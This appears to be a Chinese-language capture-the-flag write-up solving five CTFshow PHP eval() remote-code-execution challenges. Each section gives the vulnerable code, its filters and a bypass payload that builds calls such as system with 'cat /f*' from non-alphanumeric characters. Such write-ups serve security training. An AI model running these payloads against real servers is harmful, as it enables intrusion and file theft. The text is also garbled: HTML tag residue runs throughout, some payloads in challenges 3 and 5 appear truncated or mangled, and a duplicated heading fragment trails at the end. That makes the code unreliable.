CTFshow RCE挑战系列解题详解<\/h1>

RCE挑战1<\/h2>

代码分析<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>$code =<\/span> $_POST['code'<\/span>];
<\/span><\/span>$code =<\/span> str_replace<\/span>("("<\/span>,"括号"<\/span>,$code);
<\/span><\/span>$code =<\/span> str_replace<\/span>("."<\/span>,"点"<\/span>,$code);
<\/span><\/span>eval<\/span>($code);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>过滤规则<\/h3>

禁用所有错误报告<\/li>
将左括号"("替换为"括号"<\/li>
将点"."替换为"点"<\/li>
<\/ol>
绕过方法<\/h3>

使用反引号`<\/code>执行命令，无需括号<\/li>
使用echo<\/code>输出结果<\/li>
<\/ol>
有效payload<\/h3>
code=echo `cat \/f*`;
<\/code><\/pre>
RCE挑战2<\/h2>
代码分析<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>if<\/span> (isset<\/span>($_POST['ctf_show'<\/span>])) {
<\/span><\/span>    $ctfshow =<\/span> $_POST['ctf_show'<\/span>];
<\/span><\/span>    if<\/span> (is_string<\/span>($ctfshow)) {
<\/span><\/span>        if<\/span> (!<\/span>preg_match<\/span>("\/[a-zA-Z0-9@#%^&*:<>?|{}+-]\/"<\/span>,$ctfshow)){
<\/span><\/span>            eval<\/span>($ctfshow);
<\/span><\/span>        }else<\/span>{
<\/span><\/span>            echo<\/span>("Are you hacking me AGAIN?"<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        phpinfo<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>过滤规则<\/h3>
过滤了所有字母、数字和特殊字符@#%^&*:<>?|{}+-<\/code><\/p>
绕过方法<\/h3>

使用变量自增构造webshell<\/li>
通过$_GET<\/code>传参<\/li>
<\/ol>
有效payload<\/h3>
POST: ctf_show=$_=[]._;$__=$_['!'=='='];$__++;$__++;$__++;$___=++$__;++$__;$___=++$__.$___;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___=$___.++$__;$_=_.$___;(
$$
_[_])(
$$
_[__]);
GET: ?_=system&__=ls \/
<\/code><\/pre>
RCE挑战3<\/h2>
代码分析<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>if<\/span> (isset<\/span>($_POST['ctf_show'<\/span>])) {
<\/span><\/span>    $ctfshow =<\/span> $_POST['ctf_show'<\/span>];
<\/span><\/span>    if<\/span> (is_string<\/span>($ctfshow) &&<\/span> strlen<\/span>($ctfshow) <=<\/span> 105<\/span>) {
<\/span><\/span>        if<\/span> (!<\/span>preg_match<\/span>("\/[a-zA-Z2-9!@#%^&*:<>?|{}+-]\/"<\/span>,$ctfshow)){
<\/span><\/span>            eval<\/span>($ctfshow);
<\/span><\/span>        }else<\/span>{
<\/span><\/span>            echo<\/span>("Are you hacking me AGAIN?"<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        phpinfo<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>过滤规则<\/h3>

长度限制105字符<\/li>
过滤了字母、数字2-9和特殊字符!@#%^&*:<>?|{}+-<\/code><\/li>
允许使用$<\/code>、0<\/code>、1<\/code><\/li>
<\/ol>
绕过方法<\/h3>

使用(0\/0)<\/code>构造NAN<\/code><\/li>
使用(1\/0)<\/code>构造INF<\/code><\/li>
通过字符串转换获取所需字符<\/li>
<\/ol>
有效payload<\/h3>
ctf_show=$%ff=(0\/0);$%ff.=_;$%ff=$%ff[0];$%ff%2b%2b;$%fd=$%ff%2b%2b;$%fe=$%ff%2b%2b;$%ff%2b%2b;$%ff%2b%2b;$%fc=$%ff%2b%2b;$%fb=$%ff;fe.$%fd.$%fc.$%fb;
$$
_[0](
$$
_[1]);&0=system&1=cat \/f1agaaa
<\/code><\/pre>
RCE挑战4<\/h2>
代码分析<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>if<\/span> (isset<\/span>($_POST['ctf_show'<\/span>])) {
<\/span><\/span>    $ctfshow =<\/span> $_POST['ctf_show'<\/span>];
<\/span><\/span>    if<\/span> (is_string<\/span>($ctfshow) &&<\/span> strlen<\/span>($ctfshow) <=<\/span> 84<\/span>) {
<\/span><\/span>        if<\/span> (!<\/span>preg_match<\/span>("\/[a-zA-Z1-9!@#%^&*:<>?|{}+-]\/"<\/span>,$ctfshow)){
<\/span><\/span>            eval<\/span>($ctfshow);
<\/span><\/span>        }else<\/span>{
<\/span><\/span>            echo<\/span>("Are you hacking me AGAIN?"<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        phpinfo<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>过滤规则<\/h3>

长度限制84字符<\/li>
过滤了字母、数字1-9和特殊字符!@#%^&*:<>?|{}+-<\/code><\/li>
允许使用$<\/code>、0<\/code><\/li>
<\/ol>
绕过方法<\/h3>

使用(0\/0)<\/code>构造NAN<\/code><\/li>
通过数组拼接获取字符<\/li>
<\/ol>
有效payload<\/h3>
ctf_show=$_=((0\/0).[])[0];$_++;$__=$_.$_++;$_++;$_++;$_++;$_=_.$__.$_.++$_;
$$
_[_](
$$
_[0]);&_=system&0=cat \/f*
<\/code><\/pre>
RCE挑战5<\/h2>
代码分析<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>if<\/span> (isset<\/span>($_POST['ctf_show'<\/span>])) {
<\/span><\/span>    $ctfshow =<\/span> $_POST['ctf_show'<\/span>];
<\/span><\/span>    if<\/span> (is_string<\/span>($ctfshow) &&<\/span> strlen<\/span>($ctfshow) <=<\/span> 73<\/span>) {
<\/span><\/span>        if<\/span> (!<\/span>preg_match<\/span>("\/[a-zA-Z0-9!@#%^&*:<>?|{}+-]\/"<\/span>,$ctfshow)){
<\/span><\/span>            eval<\/span>($ctfshow);
<\/span><\/span>        }else<\/span>{
<\/span><\/span>            echo<\/span>("Are you hacking me AGAIN?"<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        phpinfo<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>过滤规则<\/h3>

长度限制73字符<\/li>
过滤了所有字母、数字和特殊字符!@#%^&*:<>?|{}+-<\/code><\/li>
允许使用$<\/code>、_<\/code><\/li>
<\/ol>
绕过方法<\/h3>

利用gettext()<\/code>扩展的_()<\/code>函数<\/li>
使用不可见字符作为变量名<\/li>
<\/ol>
有效payload<\/h3>
ctf_show=$%ff=_(%ff\/%ff)[%ff];$_=%2b%2b$%ff;$_=_.%2b%2b$%ff.$_;$%ff%2b%2b;$%ff%2b%2b;$_.=%2b%2b$%ff.%2b%2b$%ff;ff]);&_=system&%ff=cat \/f1agaaa
<\/code><\/pre>
通用技巧总结<\/h2>


字符构造方法<\/strong>:<\/p>

使用(0\/0)<\/code>得到NAN<\/code><\/li>
使用(1\/0)<\/code>得到INF<\/code><\/li>
使用([].[])<\/code>得到ArrayArray<\/code><\/li>
<\/ul>
<\/li>

变量自增<\/strong>:<\/p>

$a++<\/code>和++$a<\/code>的区别<\/li>
通过自增从A<\/code>构造到Z<\/code><\/li>
<\/ul>
<\/li>

特殊函数利用<\/strong>:<\/p>

_()<\/code>相当于gettext()<\/code><\/li>
eval()<\/code>执行PHP代码<\/li>
<\/ul>
<\/li>

编码技巧<\/strong>:<\/p>

URL编码特殊字符<\/li>
使用不可见字符缩短payload长度<\/li>
<\/ul>
<\/li>

命令执行<\/strong>:<\/p>

反引号`<\/code>执行命令<\/li>
system()<\/code>函数执行系统命令<\/li>
<\/ul>
<\/li>

长度优化<\/strong>:<\/p>

使用最短的变量名<\/li>
利用PHP的隐式类型转换<\/li>
链式操作减少语句数量<\/li>
<\/ul>
<\/li>
<\/ol>
CTFshow RCE挑战系列解题详解<\/h1>

RCE挑战1<\/h2>

RCE挑战2<\/h2>

过滤规则<\/h3> 过滤了所有字母、数字和特殊字符@#%^&*:<>?|{}+-<\/code><\/p>

RCE挑战3<\/h2>

RCE挑战4<\/h2>

RCE挑战5<\/h2>

过滤规则<\/h3>
过滤了所有字母、数字和特殊字符`@#%^&*:<>?|{}+-<\/code><\/p>`
